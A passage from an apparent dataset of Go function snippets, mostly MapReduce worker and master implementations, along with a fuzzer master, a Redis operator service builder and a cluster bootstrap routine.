i++ {\n\t\t\t\ttmpFileName := \"tmp-\" + strconv.Itoa(maptask.TaskNum) + \"-\" + strconv.Itoa(i) + \".txt\"\n\t\t\t\tifile, err := ioutil.TempFile(\"\", tmpFileName)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Fatalf(\"Cannot create ifile: %v\\n\", err)\n\t\t\t\t}\n\n\t\t\t\tenc := json.NewEncoder(ifile)\n\t\t\t\tfor _, kv := range intermediate[i] {\n\t\t\t\t\tif err := enc.Encode(&kv); err != nil {\n\t\t\t\t\t\tlog.Fatalf(\"Cannot write to file: %v\\n\", err)\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tos.Rename(ifile.Name(), tmpFileName)\n\t\t\t}\n\t\t} else {\n\t\t\tlog.Printf(\"[Worker %v] Waiting for other workers to finish...\\n\", os.Getpid())\n\t\t\ttime.Sleep(1 * time.Second)\n\t\t}\n\n\t\tisMapFinished = CallCompleteMapTask(maptask)\n\t}\n\n\tisReduceFinished := false\n\tfor isReduceFinished != true {\n\t\treducetask := CallAssignReduceTask()\n\n\t\tif reducetask.TaskNum != -1 {\n\t\t\tlog.Printf(\"[Worker %v] Starting on reduce task: %+v\\n\", os.Getpid(), reducetask)\n\t\t\tpattern := fmt.Sprintf(\"./tmp-*-%v.txt\", reducetask.TaskNum)\n\t\t\tfilenames, _ := filepath.Glob(pattern)\n\t\t\tvar intermediate []KeyValue\n\t\t\tfor _, p := range filenames {\n\t\t\t\tfile, err := os.Open(p)\n\t\t\t\tdefer file.Close()\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Fatalf(\"cannot open reduce %v\\n\", p)\n\t\t\t\t}\n\t\t\t\tdec := json.NewDecoder(file)\n\t\t\t\tfor {\n\t\t\t\t\tvar kv KeyValue\n\t\t\t\t\tif err := dec.Decode(&kv); err != nil {\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t\tintermediate = append(intermediate, kv)\n\t\t\t\t}\n\t\t\t}\n\t\t\tsort.Sort(ByKey(intermediate))\n\t\t\toname := \"./mr-out-\" + strconv.Itoa(reducetask.TaskNum)\n\t\t\tofile, _ := os.Create(oname)\n\t\t\tdefer ofile.Close()\n\t\t\ti := 0\n\t\t\tfor i < len(intermediate) {\n\t\t\t\tj := i + 1\n\t\t\t\tfor j < len(intermediate) && intermediate[i].Key == intermediate[j].Key {\n\t\t\t\t\tj++\n\t\t\t\t}\n\t\t\t\tvalues := []string{}\n\t\t\t\tfor k := i; k < j; k++ {\n\t\t\t\t\tvalues = append(values, intermediate[k].Value)\n\t\t\t\t}\n\n\t\t\t\toutput := reducef(intermediate[i].Key, values)\n\t\t\t\tfmt.Fprintf(ofile, \"%v %v\\n\", intermediate[i].Key, output)\n\n\t\t\t\ti = j\n\t\t\t}\n\t\t} else {\n\t\t\tlog.Printf(\"[Worker %v] Waiting for other workers to finish...\\n\", os.Getpid())\n\t\t\ttime.Sleep(1 * time.Second)\n\t\t}\n\n\t\tisReduceFinished = CallCompleteReduceTask(reducetask)\n\t}\n\n}", "func (s *RedisSystem) NewMaster(server string) {\n\tlogInfo(\"setting new master: %s\", server)\n\ts.currentMaster = NewRedisShim(server)\n}", "func Worker(mapf func(string, string) []KeyValue,\n\t\t\treducef func(string, []string) string) {\n\n\t// Your worker implementation here.\n\n\t// TODO: maybe use a channel for in-process comm?\n\t// determine task state to know which master RPC to call\n\t//reply := CallRegisterIdle()\n\tvar reply *RegisterIdleReply\n\n\t//for workerInfo.State == IDLE || workerInfo.State == COMPLETED {\n\tfor {\n\n\t\tif workerInfo.State == IDLE {\n\t\t\treply = CallRegisterIdle()\n\t\t\tif reply == nil {\n\t\t\t\tworker_logger.Error(\"Got Error!!!!!!\")\n\t\t\t}\n\t\t} else if workerInfo.State == COMPLETED {\n\t\t\treply = CallCompletedTask() // override reply\n\t\t\t//if reply != nil {\n\t\t\t//\tresetWorkerInfo()\n\t\t\t//\tworkerInfo.State = IDLE\n\t\t\t//}\n\t\t\tif reply == nil {\n\t\t\t\tworker_logger.Error(\"Got errror!!!!!!!!\")\n\t\t\t}\n\t\t} else {\n\t\t\tworker_logger.Error(\"Shouldn't be in IN_PROGRESS state here...\")\n\t\t}\n\n\t\t// TODO: maybe don't need a mutex?\n\t\tif reply.MasterCommand == ASSIGN_TASK {\n\n\t\t\tworkerInfo.State = IN_PROGRESS\n\t\t\tworkerInfo.Id = reply.WorkerId\n\t\t\tworkerInfo.TaskType = reply.TaskType\n\t\t\tworkerInfo.TaskId = reply.TaskId\n\t\t\tworkerInfo.InputFileLoc = reply.InputFileLoc\n\t\t\tworkerInfo.NReduce = reply.NReduce\n\t\t\t//workerInfo.Progress = 0.0\n\n\t\t\t// TODO: replace this with broadcaster/observer design\n\t\t\tprogress_ch := make(chan float32)\n\t\t\tdone := make(chan struct{})\n\t\t\theartbeatStoped := make(chan struct {})\n\n\n\t\t\t// Actual computing job goroutine\n\t\t\tgo func() {\n\t\t\t\tif workerInfo.TaskType == MAP {\n\t\t\t\t\tdoMapTask(&workerInfo, mapf, progress_ch)\n\t\t\t\t} else if workerInfo.TaskType == REDUCE {\n\t\t\t\t\tdoReduceTask(&workerInfo, reducef, progress_ch)\n\t\t\t\t}/* else { // None task\n\t\t\t\t\tclose(progress_ch)\n\t\t\t\t}*/\n\n\t\t\t}()\n\n\t\t\t// Heartbeat gorountine\n\t\t\tgo func() {\n\t\t\t\tfor {\n\t\t\t\t\tselect {\n\t\t\t\t\t\tcase <-done:\n\t\t\t\t\t\t\tworker_logger.Debug(\"heartbeat job received done signal, stopping!\")\n\t\t\t\t\t\t\theartbeatStoped <- struct{}{}\n\t\t\t\t\t\t\tclose(heartbeatStoped)\n\t\t\t\t\t\t\treturn\n\t\t\t\t\t\tdefault:\n\t\t\t\t\t\t\tCallSendHeartbeat()\n\t\t\t\t\t\t\ttime.Sleep(1*time.Second)\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t}()\n\n\n\t\t\tfor progress := range progress_ch {\n\t\t\t\tworker_logger.Debug(fmt.Sprintf(\"Task(%s) progress: %f\", workerInfo.TaskId, progress))\n\t\t\t}\n\t\t\tdone <- struct{}{}\n\t\t\tclose(done)\n\t\t\t<- heartbeatStoped\n\n\t\t\t// Set result location & worker state\n\t\t\tworkerInfo.State = COMPLETED\n\n\t\t} else if reply.MasterCommand == STAND_BY {\n\t\t\tworker_logger.Debug(fmt.Sprintf(\"Got masterCommand: %s\", reply.MasterCommand))\n\t\t\ttime.Sleep(500*time.Millisecond)\n\t\t} else if reply.MasterCommand == PLEASE_EXIT {\n\t\t\tworker_logger.Info(fmt.Sprintf(\"Got masterCommand: %s\", reply.MasterCommand))\n\t\t\treturn\n\t\t}\n\n\t}\n\n\n\t// uncomment to send the Example RPC to the master.\n\t// CallExample()\n\n}", "func (m *Master) Build() {\n\toutChannel := make(chan [2]string, 100)\n\n\tvar channels [][]chan [2]string\n\tfor i := 0; i < len(m.workers); i++ {\n\t\tvar newChannels []chan [2]string\n\t\tfor j := 0; j < len(m.workers[i]); j++ {\n\t\t\tnewChannels = append(newChannels, make(chan [2]string, 100))\n\t\t}\n\t\tchannels = append(channels, newChannels)\n\t}\n\tfor j := 0; j < len(m.workers[0]); j++ {\n\t\tm.workers[0][j].init(1, channels[0][j], channels[1])\n\t}\n\tfor i := 1; i < len(m.workers)-1; i++ {\n\t\tfor j := 0; j < len(m.workers[i]); j++ {\n\t\t\tm.workers[i][j].init(len(m.workers[i-1]), channels[i][j], channels[i+1])\n\t\t}\n\t}\n\tlast := len(m.workers) - 1\n\tfor j := 0; j < len(m.workers[last]); j++ {\n\t\tm.workers[last][j].init(len(m.workers[last-1]), channels[last][j], []chan [2]string{outChannel})\n\t}\n\n\tm.input.init(channels[0])\n\n\tm.output.init(len(m.workers[last]), outChannel)\n\n\tm.output.numUpstream = len(m.workers[last])\n\tm.output.inChannel = outChannel\n\tm.output.endChannel = make(chan int)\n}", "func (m *Master) Connect(a *ConnectArgs, r *ConnectRes) error {\n\tm.mu.Lock()\n\tdefer m.mu.Unlock()\n\n\tm.idSeq++\n\ts := &MasterSlave{\n\t\tid: m.idSeq,\n\t\tprocs: a.Procs,\n\t\tlastSync: time.Now(),\n\t}\n\tm.slaves[s.id] = s\n\tr.ID = s.id\n\t// Give the slave initial corpus.\n\tfor _, a := range m.corpus.m {\n\t\tr.Corpus = append(r.Corpus, MasterInput{a.data, a.meta, execCorpus, !a.user, true})\n\t}\n\treturn nil\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t// Your worker implementation here.\n\n\t// uncomment to send the Example RPC to the master.\n\t// CallExample()\n\n\tcallMs := true\n\n\ttfl := make([]string, 0)\n\tfor callMs {\n\t\tcallMs, _ = callMaster(mapf, &tfl)\n\t\t//time.Sleep(5 * time.Second)\n\t}\n\n\t//\tsort.Sort(ByKey(intermediate))\n\trand.Seed(time.Now().UnixNano())\n\tred := rand.Intn(1000)\n\tfmt.Printf(\"Reducer filename %d \\n\", red)\n\toname := fmt.Sprintf(\"mr-out-%d.txt\", red)\n\n\tofile, _ := os.Create(oname)\n\tintermediate1 := []KeyValue{}\n\tvar fm sync.Mutex\n\tfm.Lock()\n\tfor _, tf := range tfl {\n\t\tfile, err := os.Open(tf)\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"cannot open %v\", tf)\n\t\t}\n\t\tdec := json.NewDecoder(file)\n\t\tfor {\n\t\t\tvar kv KeyValue\n\t\t\tif err := dec.Decode(&kv); err != nil {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tintermediate1 = append(intermediate1, kv)\n\t\t}\n\t}\n\tsort.Sort(ByKey(intermediate1))\n\n\tfm.Unlock()\n\ti := 0\n\tfor i < len(intermediate1) {\n\t\tj := i + 1\n\t\tfor j < len(intermediate1) && intermediate1[j].Key == intermediate1[i].Key {\n\t\t\tj++\n\t\t}\n\t\tvalues := []string{}\n\t\tfor k := i; k < j; k++ {\n\t\t\tvalues = append(values, intermediate1[k].Value)\n\t\t}\n\t\toutput := reducef(intermediate1[i].Key, values)\n\n\t\t// this is the correct format for each line of Reduce output.\n\t\tfmt.Fprintf(ofile, \"%v %v\\n\", intermediate1[i].Key, output)\n\n\t\ti = j\n\t}\n\tfor _, f := range tfl {\n\t\tos.Remove(f)\n\t}\n\tofile.Close()\n\tCallNotify(\"wc\", 0)\n\n}", "func CreateMaster() (*ObiMaster) {\n\n\t// Load priority map\n\tpriorityMap := map[string]int{}\n\ttmp := viper.GetStringMap(\"priorityMap\")\n\tfor k, v := range tmp {\n\t\tif vInt, ok := v.(int); ok {\n\t\t\tpriorityMap[k] = vInt\n\t\t} else {\n\t\t\tlogrus.Panicln(\"Not integer value in the priority map.\")\n\t\t}\n\n\t}\n\n\t// Start up the pool\n\tpool.GetPool().StartLivelinessMonitoring()\n\n\t// Setup scheduler\n\tsubmitter := pool.NewSubmitter()\n\tscheduler := scheduling.New(submitter)\n\tscheduler.SetupConfig()\n\n\t// Setup heartbeat\n\thb := heartbeat.New()\n\n\t// Start everything\n\thb.Start()\n\tscheduler.Start()\n\n\t// Open connection to predictor server\n\tserverAddr := fmt.Sprintf(\"%s:%d\",\n\t\tos.Getenv(\"PREDICTOR_SERVICE_DNS_NAME\"),\n\t\t8080)\n\tconn, err := grpc.Dial(serverAddr, grpc.WithInsecure())\n\tif err != nil {\n\t\tlogrus.Fatalf(\"fail to dial: %v\", err)\n\t}\n\tpClient := predictor.NewObiPredictorClient(conn)\n\n\t// Open connection to persistent storage\n\terr = persistent.CreatePersistentConnection()\n\tif err != nil {\n\t\tlogrus.Fatal(\"Could not connect to persistent database\")\n\t}\n\tlogrus.Info(\"Connected to persistent database\")\n\n\t// Create and return OBI master object\n\tmaster := ObiMaster {\n\t\tscheduler: scheduler,\n\t\theartbeatReceiver: hb,\n\t\tpredictorClient: &pClient,\n\t\tpriorities: priorityMap,\n\t}\n\n\t// Recover from failure by rescheduling any jobs which are still in the pending state\n\tpendingJobs, err := persistent.GetPendingJobs()\n\tif err != nil {\n\t\tlogrus.WithField(\"error\", err).Error(\"Unable to load pending jobs from database\")\n\t}\n\tfor _, job := range pendingJobs {\n\t\tmaster.scheduler.ScheduleJob(job)\n\t}\n\n\treturn &master\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\tmapTaskCount, reduceTaskCount := 0, 0\n\tfor true {\n\t\targs, reply := GetTaskArgs{}, GetTaskReply{}\n\t\tcall(\"Master.GetTask\", &args, &reply)\n\n\t\tif reply.TaskType == \"Map\" {\n\t\t\tmapTaskCount++\n\t\t\tdoMap(reply.FilePath, mapf, reply.MapTaskNum, reply.ReduceTaskCount)\n\t\t} else if reply.TaskType == \"Reduce\" {\n\t\t\treduceTaskCount++\n\t\t\tdoReduce(reply.ReduceTaskNum, reducef, reply.FilePathList)\n\t\t} else if reply.TaskType == \"Clean Exit\" {\n\t\t\tos.Exit(0)\n\t\t}\n\t}\n\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t// init\n\ttaskId = 9999\n\n\t//\n\tfor {\n\t\ttime.Sleep(time.Second)\n\n\t\treply := CallAssign()\n\n\t\t// fmt.Println(reply)\n\n\t\tif reply.TaskId < 0 {\n\t\t\t// fmt.Println(\"Waiting for assigning a work...\")\n\t\t\tcontinue\n\t\t}\n\n\t\t// modify taskId and later will tell master who i am\n\t\ttaskId = reply.TaskId\n\n\t\tif reply.TaskType == \"map\" {\n\t\t\tfile, err := os.Open(reply.FileName)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"cannot open %v\", reply.FileName)\n\t\t\t}\n\t\t\tcontent, err := ioutil.ReadAll(file)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"cannot read %v\", reply.FileName)\n\t\t\t}\n\t\t\tfile.Close()\n\t\t\tkva := mapf(reply.FileName, string(content))\n\n\t\t\t// sort\n\t\t\t// sort.Sort(ByKey(kva))\n\n\t\t\t// store intermediate kvs in tempFile\n\t\t\ttempFileName := \"tmp-\" + reply.TaskType + \"-\" + strconv.Itoa(reply.TaskId)\n\n\t\t\tfile, err = os.Create(tempFileName)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatal(\"cannot create %v\", tempFileName)\n\t\t\t}\n\n\t\t\t// transform k,v into json\n\t\t\tenc := json.NewEncoder(file)\n\t\t\tfor _, kv := range kva {\n\t\t\t\terr := enc.Encode(&kv)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Fatal(err)\n\t\t\t\t}\n\t\t\t}\n\t\t\t//\n\t\t\tfile.Close()\n\n\t\t\t// try to delay sometime\n\t\t\t// ran := rand.Intn(4)\n\t\t\t// fmt.Printf(\"Sleep %v s\\n\", ran)\n\t\t\t// d := time.Second * time.Duration(ran)\n\t\t\t// time.Sleep(d)\n\n\t\t\t// tell the master the mapwork has done\n\t\t\tCallDoneTask(reply, tempFileName)\n\n\t\t} else if reply.TaskType == \"reduce\" {\n\t\t\t// fmt.Println(reply.TaskType)\n\n\t\t\tkva := []KeyValue{}\n\n\t\t\tfile, err := os.Open(reply.FileName)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatal(err)\n\t\t\t}\n\n\t\t\tdec := json.NewDecoder(file)\n\t\t\tfor {\n\t\t\t\tvar kv KeyValue\n\t\t\t\tif err := dec.Decode(&kv); err != nil {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t\tkva = append(kva, kv)\n\t\t\t}\n\n\t\t\toutputFileName := \"mr-out-\" + strconv.Itoa(reply.TaskIndex)\n\t\t\tofile, _ := os.Create(outputFileName)\n\n\t\t\t// sort\n\t\t\t// sort.Sort(ByKey(kva))\n\n\t\t\ti := 0\n\t\t\tfor i < len(kva) {\n\t\t\t\tj := i + 1\n\t\t\t\tfor j < len(kva) && kva[j].Key == kva[i].Key {\n\t\t\t\t\tj++\n\t\t\t\t}\n\t\t\t\tvalues := []string{}\n\t\t\t\tfor k := i; k < j; k++ {\n\t\t\t\t\tvalues = append(values, kva[k].Value)\n\t\t\t\t}\n\t\t\t\toutput := reducef(kva[i].Key, values)\n\n\t\t\t\t// fmt.Println(output)\n\n\t\t\t\tfmt.Fprintf(ofile, \"%v %v\\n\", kva[i].Key, output)\n\n\t\t\t\ti = j\n\t\t\t}\n\n\t\t\tofile.Close()\n\n\t\t\t// fmt.Printf(\"Reduce task %v has finished.\\n\", reply.TaskIndex)\n\n\t\t\t// ran := rand.Intn(4)\n\t\t\t// fmt.Printf(\"Sleep %v s\\n\", ran)\n\t\t\t// d := time.Second * time.Duration(ran)\n\t\t\t// time.Sleep(d)\n\n\t\t\tCallDoneTask(reply, outputFileName)\n\t\t} else if reply.TaskType == \"close\" {\n\t\t\t// fmt.Println(\"MapReduce has done. Exiting...\")\n\t\t\tbreak\n\t\t} else {\n\t\t\tfmt.Println(\"UnExcepted TaskType\")\n\t\t}\n\n\t}\n\n}", "func CreateMasterService(cr *redisv1alpha1.Redis) {\n\tmasterReplicas := cr.Spec.Size\n\tfor serviceCount := 0; serviceCount <= int(*masterReplicas)-1; serviceCount++ {\n\t\tlabels := map[string]string{\n\t\t\t\"app\": cr.ObjectMeta.Name + \"-master\",\n\t\t\t\"role\": \"master\",\n\t\t\t\"statefulset.kubernetes.io/pod-name\": cr.ObjectMeta.Name + \"-master-\" + strconv.Itoa(serviceCount),\n\t\t}\n\t\tserviceDefinition := GenerateServiceDef(cr, labels, int32(redisPort), \"master\", cr.ObjectMeta.Name+\"-master-\"+strconv.Itoa(serviceCount), \"None\")\n\t\tserviceBody, err := GenerateK8sClient().CoreV1().Services(cr.Namespace).Get(cr.ObjectMeta.Name+\"-master-\"+strconv.Itoa(serviceCount), metav1.GetOptions{})\n\t\tservice := ServiceInterface{\n\t\t\tExistingService: serviceBody,\n\t\t\tNewServiceDefinition: serviceDefinition,\n\t\t\tServiceType: \"master\",\n\t\t}\n\t\tCompareAndCreateService(cr, service, err)\n\t}\n}", "func main() {\n\tif len(os.Args) < 4 {\n\t\tfmt.Printf(\"%s: see usage comments in file\\n\", os.Args[0])\n\t} else if os.Args[1] == \"master\" {\n\t\tvar mr *mapreduce.Master\n\t\tif os.Args[2] == \"sequential\" {\n\t\t\tmr = mapreduce.Sequential(\"iiseq\", os.Args[3:], 3, mapF, reduceF)\n\t\t} else {\n\t\t\tmr = mapreduce.Distributed(\"iiseq\", os.Args[3:], 3, os.Args[2])\n\t\t}\n\t\tmr.Wait()\n\t} else {\n\t\tmapreduce.RunWorker(os.Args[2], os.Args[3], mapF, reduceF, 100)\n\t}\n}", "func main() {\n\tif len(os.Args) < 4 {\n\t\tfmt.Printf(\"%s: see usage comments in file\\n\", os.Args[0])\n\t} else if os.Args[1] == \"master\" {\n\t\tvar mr *mapreduce.Master\n\t\tif os.Args[2] == \"sequential\" {\n\t\t\tmr = mapreduce.Sequential(\"iiseq\", os.Args[3:], 3, mapF, reduceF)\n\t\t} else {\n\t\t\tmr = mapreduce.Distributed(\"iiseq\", os.Args[3:], 3, os.Args[2])\n\t\t}\n\t\tmr.Wait()\n\t} else {\n\t\tmapreduce.RunWorker(os.Args[2], os.Args[3], mapF, reduceF, 100)\n\t}\n}", "func New(n int) MMR {\n\tpeaks, heights := peaksAndHeights(n)\n\treturn MMR{\n\t\tpeaks: peaks,\n\t\theights: heights,\n\t}\n}", "func CreateWorkers(n int) ([]raft.FSM) {\n workers := make([]*WorkerFSM, n)\n for i := range workers {\n workers[i] = &WorkerFSM{\n KeyValMap: make(map[string]string),\n counter: 0,\n }\n }\n fsms := make([]raft.FSM, n)\n for i, w := range workers {\n fsms[i] = w\n }\n return fsms\n}", "func New(f func(interface{})) Balancer {\n\toutgoing := make(chan message.Message, math.MaxInt16)\n\tincoming := make(chan message.Message, math.MaxInt16)\n\tm := &master{\n\t\tid: generateID(),\n\t\tf: f,\n\t\tincoming: incoming,\n\t\toutgoing: outgoing,\n\t}\n\tm.startWorker() // to have one worker at least waiting for tasks\n\tgo m.start()\n\tgo func() { // logging purposes\n\t\tfor range time.Tick(time.Second) {\n\t\t\tlog.Printf(\"(Worker Count, WIP, WIQ) (%d, %d, %d) go: %d\", m.workerCount, m.wip, m.wiq, runtime.NumGoroutine())\n\t\t}\n\t}()\n\treturn m\n}", "func main() {\n\tif len(os.Args) < 4 {\n\t\tfmt.Printf(\"%s: see usage comments in file\\n\", os.Args[0])\n\t} else if os.Args[1] == \"master\" {\n\t\tvar mr *mapreduce.Master\n\t\tif os.Args[2] == \"sequential\" {\n\t\t\tmr = mapreduce.Sequential(\"iiseq\", os.Args[3:], 3, mapF, reduceF)\n\t\t} else {\n\t\t\tmr = mapreduce.Distributed(\"iiseq\", os.Args[3:], 3, os.Args[2])\n\t\t}\n\t\tmr.Wait()\n\t} else {\n\t\tmapreduce.RunWorker(os.Args[2], os.Args[3], mapF, reduceF, 100, nil)\n\t}\n}", "func NewMaster(addr string, port int, cert *services.HTTPCert) *Master {\n\tvar sm *services.HTTPService\n\n\tif cert == nil {\n\t\tsm = services.NewHTTPService(\"master\", addr, port, nil)\n\t} else {\n\t\tsm = services.NewHTTPSecureService(\"master\", addr, port, cert, nil)\n\t}\n\n\t// reg, err := sm.Select(\"register\")\n\t//\n\t// if err == nil {\n\t//\n\t// \treg.Terminal().Only(grids.ByPackets(func(g *grids.GridPacket) {\n\t// \t\tfmt.Println(\"/register receieves\", g)\n\t// \t}))\n\t// }\n\t//\n\t// disc, err := sm.Select(\"discover\")\n\t//\n\t// if err == nil {\n\t//\n\t// \tdisc.Terminal().Only(grids.ByPackets(func(g *grids.GridPacket) {\n\t// \t\tfmt.Println(\"/discover receieves\", g)\n\t// \t}))\n\t// }\n\t//\n\t// unreg, err := sm.Select(\"unregister\")\n\t//\n\t// if err == nil {\n\t//\n\t// \tunreg.Terminal().Only(grids.ByPackets(func(g *grids.GridPacket) {\n\t// \t\tfmt.Println(\"/unregister receieves\", g)\n\t// \t}))\n\t// }\n\n\treturn &Master{sm}\n}", "func NewSimpleMapReduce(mappers int, mapQueueSize int, reduceQueueSize int) *SimpleMapReduce {\n return &SimpleMapReduce{\n mappers: mappers,\n hasStarted: false,\n mapFn: func (item interface{}) interface{} {\n return item\n },\n reduceFn: nil,\n workQueue: make(chan interface{}, mapQueueSize),\n reduceQueue: make(chan interface{}, reduceQueueSize),\n mappersFinished: make([]chan bool, mappers),\n reducedFinished: make(chan bool),\n }\n}", "func masterMain(ln net.Listener) {\n\tm := &Master{}\n\tm.startTime = time.Now()\n\tm.lastInput = time.Now()\n\tm.suppressions = newPersistentSet(filepath.Join(*flagWorkdir, \"suppressions\"))\n\tm.crashers = newPersistentSet(filepath.Join(*flagWorkdir, \"crashers\"))\n\tm.corpus = newPersistentSet(filepath.Join(*flagWorkdir, \"corpus\"))\n\tif len(m.corpus.m) == 0 {\n\t\tm.corpus.add(Artifact{[]byte{}, 0, false})\n\t}\n\n\tm.slaves = make(map[int]*MasterSlave)\n\tgo masterLoop(m)\n\n\ts := rpc.NewServer()\n\ts.Register(m)\n\ts.Accept(ln)\n}", "func main() {\n\tif len(os.Args) < 4 {\n\t\tfmt.Printf(\"%s: see usage comments in file\\n\", os.Args[0])\n\t} else if os.Args[1] == \"master\" {\n\t\tvar mr *mapreduce.Master\n\t\tif os.Args[2] == \"sequential\" {\n\t\t\tmr = mapreduce.Sequential(\"wcseq\", os.Args[3:], 3, wcMapF, wcReduceF)\n\t\t} else {\n\t\t\tmr = mapreduce.Distributed(\"wcseq\", os.Args[3:], 3, os.Args[2])\n\t\t}\n\t\tmr.Wait()\n\t} else {\n\t\tmapreduce.RunWorker(os.Args[2], os.Args[3], wcMapF, wcReduceF, 100)\n\t}\n}", "func New(commandArgs common.CommandArgs) *Node {\n\n\tnode := Node{\n\t\tNodeCommon: common.NewNodeCommon(commandArgs, \"master\"),\n\t\t// FirstSlaveListenPort: 7500, // TODO(greg) make this an env parameter /TODO this is the *base* port that the new slave should try. incrementing if failing to get the port\n\t}\n\n\treturn &node\n}", "func (s *Service) bootstrapMaster(ctx context.Context, runner Runner, config Config, bsCfg BootstrapConfig) {\n\t// Check HTTP server port\n\tcontainerHTTPPort, _, err := s.getHTTPServerPort()\n\tif err != nil {\n\t\ts.log.Fatal().Err(err).Msg(\"Cannot find HTTP server info\")\n\t}\n\tif !WaitUntilPortAvailable(config.BindAddress, containerHTTPPort, time.Second*5) {\n\t\ts.log.Fatal().Msgf(\"Port %d is already in use\", containerHTTPPort)\n\t}\n\n\t// Select storage engine\n\tstorageEngine := bsCfg.ServerStorageEngine\n\tif storageEngine == \"\" {\n\t\tstorageEngine = s.DatabaseFeatures().DefaultStorageEngine()\n\t\tbsCfg.ServerStorageEngine = storageEngine\n\t}\n\ts.log.Info().Msgf(\"Using storage engine '%s'\", bsCfg.ServerStorageEngine)\n\n\t// Create initial cluster configuration\n\thasAgent := boolFromRef(bsCfg.StartAgent, !s.mode.IsSingleMode())\n\thasDBServer := boolFromRef(bsCfg.StartDBserver, true)\n\thasCoordinator := boolFromRef(bsCfg.StartCoordinator, true)\n\thasResilientSingle := boolFromRef(bsCfg.StartResilientSingle, s.mode.IsActiveFailoverMode())\n\thasSyncMaster := boolFromRef(bsCfg.StartSyncMaster, true) && config.SyncEnabled\n\thasSyncWorker := boolFromRef(bsCfg.StartSyncWorker, true) && config.SyncEnabled\n\tme := NewPeer(s.id, config.OwnAddress, s.announcePort, 0, config.DataDir,\n\t\thasAgent, hasDBServer, hasCoordinator, hasResilientSingle,\n\t\thasSyncMaster, hasSyncWorker, s.IsSecure())\n\ts.myPeers.Initialize(me, bsCfg.AgencySize, storageEngine, s.cfg.Configuration.PersistentOptions)\n\ts.learnOwnAddress = config.OwnAddress == \"\"\n\n\t// Start HTTP listener\n\ts.startHTTPServer(config)\n\n\t// Permanent loop:\n\ts.log.Info().Msgf(\"Serving as master with ID '%s' on %s:%d...\", s.id, config.OwnAddress, s.announcePort)\n\n\t// Can we start right away?\n\tneedMorePeers := true\n\tif s.mode.IsSingleMode() {\n\t\tneedMorePeers = false\n\t} else if !s.myPeers.HaveEnoughAgents() {\n\t\tneedMorePeers = true\n\t} else if bsCfg.StartLocalSlaves {\n\t\tpeersNeeded := bsCfg.PeersNeeded()\n\t\tneedMorePeers = len(s.myPeers.AllPeers) < peersNeeded\n\t}\n\tif !needMorePeers {\n\t\t// We have all the agents that we need, start a single server/cluster right now\n\t\ts.saveSetup()\n\t\ts.log.Info().Msg(\"Starting service...\")\n\t\ts.startRunning(runner, config, bsCfg)\n\t\treturn\n\t}\n\n\twg := sync.WaitGroup{}\n\tif bsCfg.StartLocalSlaves {\n\t\t// Start additional local slaves\n\t\ts.createAndStartLocalSlaves(&wg, config, bsCfg)\n\t} else {\n\t\t// Show commands needed to start slaves\n\t\ts.log.Info().Msgf(\"Waiting for %d servers to show up.\\n\", s.myPeers.AgencySize)\n\t\ts.showSlaveStartCommands(runner, config)\n\t}\n\n\tfor {\n\t\ttime.Sleep(time.Second)\n\t\tselect {\n\t\tcase <-s.bootstrapCompleted.ctx.Done():\n\t\t\ts.saveSetup()\n\t\t\ts.log.Info().Msg(\"Starting service...\")\n\t\t\ts.startRunning(runner, config, bsCfg)\n\t\t\treturn\n\t\tdefault:\n\t\t}\n\t\tif ctx.Err() != nil {\n\t\t\t// Context is cancelled, stop now\n\t\t\tbreak\n\t\t}\n\t}\n\t// Wait for any local slaves to return.\n\twg.Wait()\n}", "func Worker(mapf func(string, string) []Pair, reducef func(string, []string) string) {\n\tclient := MakeRpcClient()\n\tdefer client.Close()\n\tfor {\n\t\t// 对端的 server 如果退出了,下面这个会有什么反应\n\t\ttask := Task{TaskKind: ReduceTaskFlag, TaskId: \"10\"}\n\n\t\t// fmt.Println(\"request task\")\n\t\tstatus := client.Call(\"Coordinator.RequestTask\", struct{}{}, &task)\n\t\t// fmt.Println(\"Get response\", task)\n\t\tif status == false {\n\t\t\tbreak\n\t\t}\n\n\t\tswitch task.TaskKind {\n\t\tcase MapTaskFlag:\n\t\t\t// fmt.Println(\"get map task \", task.TaskId)\n\t\t\tintermediate := mapf(task.File, readFileToString(task.File))\n\t\t\t// fmt.Println(\"map task done\")\n\t\t\tsort.Sort(ByKey(intermediate))\n\t\t\tr := MapResult{TaskId: task.TaskId, Items: divideIntoItems(intermediate)}\n\t\t\tclient.Call(\"Coordinator.UploadMapResult\", r, nil)\n\t\t\t// fmt.Println(\"map result upload\")\n\n\t\tcase ReduceTaskFlag:\n\t\t\tLog(\"get reduce task \", task.TaskId)\n\t\t\tfilename := fmt.Sprint(\"mr-out-\", task.TaskId)\n\t\t\tf, _ := os.Create(filename)\n\t\t\tdefer f.Close()\n\t\t\targFile, _ := os.Open(task.File)\n\t\t\treader := bufio.NewReader(argFile)\n\n\t\t\tfor {\n\t\t\t\tend, k, vs := readFrom(reader)\n\t\t\t\tif end {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t\tLog(\"reduce func call\", k)\n\t\t\t\t// fmt.Println(\"key: \", k, \"values: \", vs)\n\n\t\t\t\tv := reducef(k, vs)\n\t\t\t\tfmt.Fprintf(f, \"%v %v\\n\", k, v)\n\t\t\t}\n\t\t\tLog(\"reduce task \", task.TaskId, \"done\")\n\n\t\t\tresult := ReduceResult{TaskId: task.TaskId, Filename: filename}\n\t\t\tclient.Call(\"Coordinator.UploadReduceResult\", result, nil)\n\t\t\tLog(\"reduce task\", task.TaskId, \"result upload\")\n\n\t\tcase ShutdownFlag:\n\t\t\tfallthrough\n\t\tdefault:\n\t\t\treturn\n\t\t}\n\t}\n}", "func StartWorker(configFile *goconf.ConfigFile) 